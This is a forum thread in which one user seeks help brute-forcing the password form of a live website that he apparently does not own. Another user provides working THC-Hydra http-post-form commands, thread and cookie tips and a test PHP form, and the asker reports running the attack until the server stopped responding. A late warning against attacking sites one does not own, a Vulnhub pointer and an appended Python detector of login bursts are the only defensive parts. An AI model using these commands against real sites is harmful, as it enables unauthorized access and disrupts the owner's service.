refr3sh Posted December 2, 2016

Hello, I'm trying to get THC-Hydra working on a website form which doesn't require a username, but hydra wants me to specify it with either -l, -L or -C. The form field in question needs the following parameters, as far as I've found out using Burp Suite Free Edition:

password=test&do_login=yes&Submit=Log+in

I'm also not sure what service to use and what success or failure message the server sends (Burp Suite doesn't show it and the website doesn't display any message - it just refreshes and shows the same page). Currently I've tried http-form-post with the following parameters:

hydra -t 5 -L users.txt -f -x 2:6:a www.<url>.com http-form-post "/protected:password=^PASS^:S=success"

(Note that I've specified, with -L users.txt, a username file, but this is not required by the website's form field.)

The website's form can be found under www.<url>.com/protected. How do I tell hydra to target the /protected page, and not only the www.<url>.com part? What can I do? Any ideas?
digip Posted December 2, 2016 (edited)

Try:

hydra -vv -L passwords.file -p '' www.<url>.com http-post-form "/protected:password=^USER^&do_login=yes&Submit=Log+In:F=success:"

If success is a valid response in the page, fine, but if not, replace it with the error message or whatever text says to do, such as :F=Login: which should not be there if successful. Also, set the rate limit to 1 if you get too many false positives, which will be slower, but should work if every pass returns true.

Edited December 2, 2016 by digip
refr3sh (Author) Posted December 3, 2016

Thank you! Attempts take place. -P '' doesn't work for me, it tells me that it can't find the specified file, so I wrote -P passwords.txt instead. What do you mean by

1 hour ago, digip said:
If success is a valid response in the page, fine, but if not, replace with the error message or whatever text says to do, such as :F=Login: which should not be there if successful.

The HTML of the website defines a

<p class="cc-protected-note"> <br/> Password: </p>

which is visible on the website. So I would use:

hydra -V -f -L passwords.txt -P passwords.txt www.<url>.com http-post-form "/protected:password=^USER^&do_login=yes&Submit=Log+In:F=Password::"

(Note the double :: at the end of Password; I use it because the HTML contains it like this, and also -P passwords.txt because it doesn't matter, right? ^PASS^ is not specified so -P isn't expanded, right?)
digip Posted December 3, 2016

You should be able to use -l '' -P passwords.txt with ^PASS^ instead of user then, but Hydra can use single logins, although usually used on things like vnc://x.x.x.x:5900 with the single login and no form needed, i.e.:

hydra -l '' -P /path/to/passwords.txt vnc://x.x.x.x:5900

That is how I've used it in the past, which also works on things like telnet single logins to pass only a single input parameter, but I haven't tried it on an HTTP server with a single sign-in input. I'm assuming it should work the same, as I know hydra can do single input. You could alternatively also try ncrack, which works much the same way, but check its documentation for syntax since it's a different tool.
digip Posted December 3, 2016 (edited)

Ok, so I had to go and test this to be sure, but yes, you CAN pass single field inputs and omit either login or pass with the 2 single quotes for an empty entry, and then omit the input from the form. I tested it with a simple PHP file just to verify with a hard coded field.

Example PHP file to HTTP POST against:

Login Now
<form action="" method="post">
<input type="text" name="pass" />
<input type="submit" />
</form>
<?php
if ( $_POST['pass'] !== "password123" ) {
    echo "Try Harder";
} else {
    echo "w00t! You can haz 5,000 internets!";
}
?>

Then with hydra, you can test with your password list, put "password123" in the list anywhere, or use single -p vs -P file. Example:

hydra -l '' -p password123 192.168.1.66 http-post-form "/pass.php:pass=^PASS^:F=Try Harder:"

where the :F=Fail: matches part of the error message returned by a POST request and returns true when it's not seen any longer (or at least that is my understanding of it).

If not using a single word and a password list:

hydra -l '' -P /root/passwords/500-worst-passwords.txt 192.168.1.66 http-post-form "/pass.php:pass=^PASS^:F=Try Harder:" -t16

Change -t16 to -t1 if you get too many false positives on the actual form you're testing against. Make sure you don't need to also pass cookies or session keys. You'll have to pass them in at the end like the :F= with the header :H cookie='foo=1' :" or such (look up the syntax, I'm going from memory here).

If you're brave, you can append a -d to the end of the commands, which will turn debug on and show you what is being posted and returned.

Edited December 3, 2016 by digip
refr3sh (Author) Posted December 3, 2016

So I haven't found out the server response so far - it seems to be pretty tricky to get it to output something - but I managed to get it working with your proposed parameters and providing -l with ''. For some reason, both my Kali (in a VM) and Windows (natively) environments seem to crash after 16 attempts... I've tried ncrack before but I didn't get it to work either; I'll have a look at it now. I also tried Burp Suite, both Free and Pro version, but after some time the targeted server didn't show any response anymore although the Burp intruder kept trying.
refr3sh (Author) Posted December 3, 2016

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Dec 2016 10:01:40 GMT
Server: nginx
Vary: Accept-Encoding
X-Jimdo-Instance: i-0a4ec76da6fce403c
X-Jimdo-Wid: s742dd563442b66d6
transfer-encoding: chunked
Connection: keep-alive

This is the raw server response when I enter a password. Unfortunately, the website seems to be built with Jimdo, so I guess it's a lot harder to attack than a simple PHP-based form. Thank you for your help!
refr3sh (Author) Posted December 3, 2016

Forget about the last post, I forgot to enable decompression. I've used various tools (Burp Suite, Fiddler) to intercept the traffic and all I get is the same page as before entering a password.
digip Posted December 3, 2016

Don't attack live sites you don't own. If you want to learn, download virtual machines from Vulnhub and practice on them; a lot of them work with tools like Hydra to break into them and will show you more successful ways of doing things. Most of them have walkthroughs, which help teach you the commands and give working examples for the CTFs.

On topic, you can see and capture what is happening in a modern browser like Opera or Chrome using the console. Open a browser, and manually do the attempt while the JavaScript console is open, look on the network tab, and you should be able to see the request and response. In Opera, you can copy the request as a cURL statement, which will show the data posted. You may be leaving out something like hidden parameters or cookies. Also, don't think compression is an issue; hydra should be able to work against gzip sites as well, but check the documentation to see if there is a setting for gzip. Was the above output in the console from using the -d option for debug?
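The traffic pattern this thread describes is what a site owner would want to catch: hydra's -t16 fires parallel POSTs at /protected, and a password-only form answers every wrong guess with 200 and the same page, so status codes carry no signal. The following is an added example, not code from the thread or from hydra: a Python check over constructed nginx access-log lines (the target above reports "Server: nginx") that flags any source IP with more than a threshold of POSTs to the login path inside a 60-second sliding window. The combined log format, the sample IPs and the threshold are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# nginx "combined" access-log format, assumed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "method": m.group("method"),
            "path": m.group("path"), "status": int(m.group("status"))}

def find_bursts(lines, path="/protected", window=timedelta(seconds=60), threshold=10):
    """Map source IP -> highest number of POSTs to `path` seen inside any sliding
    `window`, keeping only IPs at or above `threshold`. The request rate to the
    login path is the signal, since every failed guess here returns 200.
    Lines are assumed to be in time order, as nginx writes them."""
    recent = defaultdict(deque)   # ip -> timestamps of POSTs still inside the window
    peak = defaultdict(int)       # ip -> largest window count observed so far
    for line in lines:
        ev = parse(line)
        if ev is None or ev["method"] != "POST" or ev["path"] != path:
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # drop entries older than the window
            q.popleft()
        peak[ev["ip"]] = max(peak[ev["ip"]], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}

def _line(ip, second, method="POST", path="/protected"):
    """Build one constructed log line (sample data, not from a real server)."""
    return (f'{ip} - - [03/Dec/2016:10:01:{second:02d} +0000] "{method} {path} HTTP/1.1" '
            f'200 1354 "-" "Mozilla/5.0"')

# Constructed sample: 16 parallel guesses from one address (the -t16 burst from the
# thread) followed by a normal visitor who loads the page once and submits once.
SAMPLE_LOG = ([_line("203.0.113.5", s) for s in range(16)]
              + [_line("198.51.100.7", 20, method="GET"), _line("198.51.100.7", 45)])

if __name__ == "__main__":
    for ip, n in find_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to /protected within 60s")
```

Lowering the window or raising the threshold tunes the check for slower guessing such as the -t1 rate mentioned above.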